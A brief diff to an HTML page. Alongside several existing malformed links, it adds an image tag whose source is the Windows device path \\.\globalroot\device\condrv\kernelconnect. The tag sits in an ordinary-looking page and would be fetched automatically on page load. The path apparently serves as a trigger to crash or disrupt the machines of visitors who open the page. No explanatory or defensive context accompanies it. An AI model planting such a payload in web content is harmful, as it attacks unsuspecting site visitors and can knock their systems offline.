--- a/index.html
+++ b/index.html
@@ -7,5 +7,6 @@
 <[URL]file:[/\\.\globalroot\device\condrv\kernelconnect[/URL]>
 <file:[/\\.\globalroot\device\condrv\kernelconnect>
 <"file:///\\.\globalroot\device\condrv\kernelconnect">
+<img src="file:///\\.\globalroot\device\condrv\kernelconnect"/>
 </body>
 </html>
